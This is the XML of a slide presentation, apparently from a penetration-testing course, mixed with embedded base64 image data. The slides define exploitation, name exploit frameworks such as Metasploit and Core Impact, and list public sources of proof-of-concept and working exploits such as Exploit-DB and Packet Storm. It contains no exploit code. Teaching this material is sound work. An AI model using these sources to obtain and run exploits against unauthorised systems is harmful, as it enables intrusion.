Fdielop2LlsDeSUypG7Z1a4u2rDQm+bnw51amxFZ9unrMW9hfi2nyvVsbFVGccnVxy+OR++IppiMYFBJIAGpJOgpjiNoqoJZgAONyBVO2/vP0oKR6R8yeLWPwFEYWZPlUUSO1t8+KwjuznT3qv5+VU+Wa9cPLTSbFchqfgKukonH8uR5Op8Rbx5Cl9l7PLt3niewUns/ZzO3aeZ7KumytmiMfPvrG/SiXiH2zMGEUADhUiGpuptXWepMusC2evVNzYak6CkM9WncnYhkfpmHVU2S/N+beC/PwrG6VjRVui27sbI6CJQfW4t+M8fIWHuqbrlEsLV1XI3Z2JUFFFFYaFFFFACWIgDCxHnw14g91ZTvVsA4WS6g9CxOU+yeaH6do8DWt0y2psxJ42R1urCxHyIPIjkaeEurEnDsjFc9Gen28OwXwkmVtUN8j20Ydh7GHMVFZ661k4njDF89JyqGFjXGejPWmEPtDZWmguOzmPA/Sq9Pgyt8vvHMe7lV4JpnisAr8Rr28D50yZOUPopYltx0pVZalsXsQ8rHx0PnURNs4ryK/L4U9kml6KCauumpkY2HAg1yWfsHxosP1rxl/wBhERwjSzN1mPM9nkPrTPaO92UkRAE+0b28tKqsm152XKTceH1pqWc8wPD+9JXpbNUmSWO2m0zZnNzawsAABTCTFgc7nsFcLg2btPyp9hdiMeVviaa2J1it5I4ln7hUns7YpblYfH+1TOC2Kq62ue01LxQAUo+XjwRwGzwgFhUkulIhq9z0rHWBfPRnpDPT3ZGy5MTKI4xrxZj6qr7TH/L1mjVkebA2M2KlCi4Qau3sr+Z4D+1a3s/BLEgVRYAAAdgFNNg7DTDRBEHeSeLNzZvy5VK1yzn2Z2ccOqCiiiplAooooAKKKKACiiigBltTZSTxskihlPEfIg8iO2sm3n3TkwbZtXhJ0e3DsVxyPfwPwrZqTnw6uCGAIIsQRcEHkQeIp4TcSc+NSPn7PRnq+7z+jU6yYTxMJP8A9bH+U+fKs+njZGKupVhoVYEEHvBrrjJS0ccouOxTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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155575" y="1371600"/>
            <a:ext cx="8836025" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The act of taking advantage of a vulnerability by utilizing an exploit, whether known or a zero-day.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	Use known exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Develop custom exploits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How?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Use an exploit framework/penetration testing suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Core Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Immunity Canvas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SAINTexploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		…and many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> more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	…or use custom scripts or applications – Build your own!</a:t>
            </a:r>
          </a:p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40355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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Exploits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41842" y="1371600"/>
            <a:ext cx="8181974" cy="5029200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“Script Kiddie Way”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Proof of concept code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Online Code Repositories (Google Code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Packet Storm Files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.packetstormsecurity.org/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	“H@x0r Underground”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fully functional exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Packet Storm Files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.packetstormsecurity.org/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Exploit-DB (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	“H@x0r Underground”</a:t>
            </a:r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marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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